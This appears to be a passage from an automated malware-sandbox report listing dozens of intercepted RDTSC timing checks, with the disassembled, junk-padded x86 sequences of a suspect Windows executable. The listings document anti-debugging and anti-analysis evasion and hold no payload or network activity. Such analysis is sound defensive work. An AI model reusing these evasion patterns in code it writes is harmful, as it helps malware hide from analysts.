                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5E0389 second address: 5E038E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5E038E second address: 5E0393 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5E09F3 second address: 5E09FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5E09FC second address: 5E0A19 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F909C7BD306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jc 00007F909C7BD312h 0x00000015 jnp 00007F909C7BD30Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5AEAD0 second address: 5AEAEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F909CBB3524h 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5E7487 second address: 5E74A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F909C7BD313h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5E74A6 second address: 5E74AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5E74AA second address: 5E74AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5E684D second address: 5E6857 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F909CBB3516h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5E69DC second address: 5E69E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5E69E2 second address: 5E69E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5E69E8 second address: 5E69EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5E6CCE second address: 5E6CE1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F909CBB351Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5E6CE1 second address: 5E6D03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909C7BD318h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5E6D03 second address: 5E6D15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F909CBB351Ch 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5E6D15 second address: 5E6D1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5E6D1B second address: 5E6D1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5E6FDE second address: 5E6FE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5E6FE2 second address: 5E6FE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5E7184 second address: 5E719B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F909C7BD311h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5E719B second address: 5E71A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5E71A4 second address: 5E71A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5E71A8 second address: 5E71C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909CBB3521h 0x00000007 js 00007F909CBB3516h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5E7338 second address: 5E7356 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 ja 00007F909C7BD306h 0x0000000d jg 00007F909C7BD306h 0x00000013 pop edx 0x00000014 je 00007F909C7BD30Eh 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EA770 second address: 5EA77A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F909CBB3516h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EA77A second address: 5EA77E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EA77E second address: 5EA7B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e push eax 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pop eax 0x00000012 popad 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 push ecx 0x00000018 pushad 0x00000019 jne 00007F909CBB3516h 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 popad 0x00000022 pop ecx 0x00000023 mov eax, dword ptr [eax] 0x00000025 pushad 0x00000026 jmp 00007F909CBB351Bh 0x0000002b push eax 0x0000002c push edx 0x0000002d jng 00007F909CBB3516h 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EAC9A second address: 5EAC9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EAC9E second address: 5EACA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EAE3F second address: 5EAE52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jng 00007F909C7BD306h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EB7B2 second address: 5EB7B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EB89A second address: 5EB89E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EB89E second address: 5EB8A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F909CBB3516h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EB8A8 second address: 5EB8AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EB9A1 second address: 5EB9A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EB9A6 second address: 5EB9BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F909C7BD306h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EBA60 second address: 5EBA77 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F909CBB3518h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b js 00007F909CBB3520h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EBF62 second address: 5EBF66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EBF66 second address: 5EBFB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 and esi, 1892C4DCh 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F909CBB3518h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b push 00000000h 0x0000002d clc 0x0000002e movzx edi, bx 0x00000031 xchg eax, ebx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F909CBB351Fh 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EC98F second address: 5EC994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EC994 second address: 5EC9D5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F909CBB3518h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 xor di, D554h 0x00000028 mov dword ptr [ebp+122D1C2Ch], ecx 0x0000002e push 00000000h 0x00000030 adc edi, 5BFE3AF0h 0x00000036 push 00000000h 0x00000038 stc 0x00000039 xchg eax, ebx 0x0000003a push edx 0x0000003b push ecx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EEEE2 second address: 5EEEE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EEEE8 second address: 5EEEEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EEC7A second address: 5EEC7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EEEEC second address: 5EEF78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909CBB3528h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007F909CBB3518h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a jl 00007F909CBB3519h 0x00000030 mov di, cx 0x00000033 xor edi, dword ptr [ebp+122D34C4h] 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push eax 0x0000003e call 00007F909CBB3518h 0x00000043 pop eax 0x00000044 mov dword ptr [esp+04h], eax 0x00000048 add dword ptr [esp+04h], 0000001Bh 0x00000050 inc eax 0x00000051 push eax 0x00000052 ret 0x00000053 pop eax 0x00000054 ret 0x00000055 mov esi, dword ptr [ebp+122D34C0h] 0x0000005b or edi, 08282340h 0x00000061 push eax 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EEF78 second address: 5EEF7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EEF7C second address: 5EEF80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EFA68 second address: 5EFA79 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F909C7BD306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EF7A8 second address: 5EF7AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EFA79 second address: 5EFA7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EF7AC second address: 5EF7B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F02F9 second address: 5F0311 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909C7BD314h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F0311 second address: 5F0323 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F909CBB351Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F10B0 second address: 5F10CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F909C7BD316h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F0323 second address: 5F0335 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jc 00007F909CBB351Eh 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F10CD second address: 5F114E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F909C7BD308h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 sub dword ptr [ebp+122D1AF4h], eax 0x0000002c mov dword ptr [ebp+124681B6h], eax 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007F909C7BD308h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 00000014h 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e stc 0x0000004f xchg eax, ebx 0x00000050 jp 00007F909C7BD314h 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007F909C7BD30Eh 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F114E second address: 5F1158 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F909CBB3516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F2B1F second address: 5F2B23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5B2165 second address: 5B2171 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5B2171 second address: 5B2175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5B2175 second address: 5B2179 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5B2179 second address: 5B217F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5B217F second address: 5B218B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F909CBB3516h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F47AC second address: 5F47B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F47B1 second address: 5F47D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F909CBB3521h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d ja 00007F909CBB3524h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F496A second address: 5F4990 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909C7BD316h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jne 00007F909C7BD306h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F4990 second address: 5F4999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F4999 second address: 5F499D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F676D second address: 5F678D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F909CBB3521h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e jnc 00007F909CBB3516h 0x00000014 pop ebx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F678D second address: 5F6792 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F499D second address: 5F4A3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909CBB351Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F909CBB3518h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 mov edi, dword ptr [ebp+122D24E7h] 0x0000002b or ebx, dword ptr [ebp+122D328Eh] 0x00000031 push dword ptr fs:[00000000h] 0x00000038 mov ebx, 2F20A7F7h 0x0000003d mov ebx, dword ptr [ebp+122D308Eh] 0x00000043 mov dword ptr fs:[00000000h], esp 0x0000004a js 00007F909CBB351Ch 0x00000050 mov ebx, dword ptr [ebp+12457851h] 0x00000056 mov eax, dword ptr [ebp+122D111Dh] 0x0000005c push 00000000h 0x0000005e push ebx 0x0000005f call 00007F909CBB3518h 0x00000064 pop ebx 0x00000065 mov dword ptr [esp+04h], ebx 0x00000069 add dword ptr [esp+04h], 0000001Ah 0x00000071 inc ebx 0x00000072 push ebx 0x00000073 ret 0x00000074 pop ebx 0x00000075 ret 0x00000076 push FFFFFFFFh 0x00000078 mov ebx, dword ptr [ebp+122D35D4h] 0x0000007e push eax 0x0000007f push eax 0x00000080 push edx 0x00000081 push eax 0x00000082 push edx 0x00000083 jl 00007F909CBB3516h 0x00000089 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F4A3E second address: 5F4A48 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F909C7BD306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F7645 second address: 5F764A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F764A second address: 5F7660 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F909C7BD312h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F7660 second address: 5F76B8 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F909CBB3516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F909CBB3518h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 mov di, 4F5Dh 0x0000002d jmp 00007F909CBB3526h 0x00000032 push 00000000h 0x00000034 mov ebx, ecx 0x00000036 push 00000000h 0x00000038 mov ebx, 3DB4E092h 0x0000003d push eax 0x0000003e pushad 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F4A48 second address: 5F4A52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F909C7BD306h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F87F5 second address: 5F87FF instructions: 0x00000000 rdtsc 0x00000002 js 00007F909CBB351Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F6897 second address: 5F689C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F69AF second address: 5F69B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F69B3 second address: 5F69B9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F9767 second address: 5F9784 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909CBB3522h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F9784 second address: 5F978A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
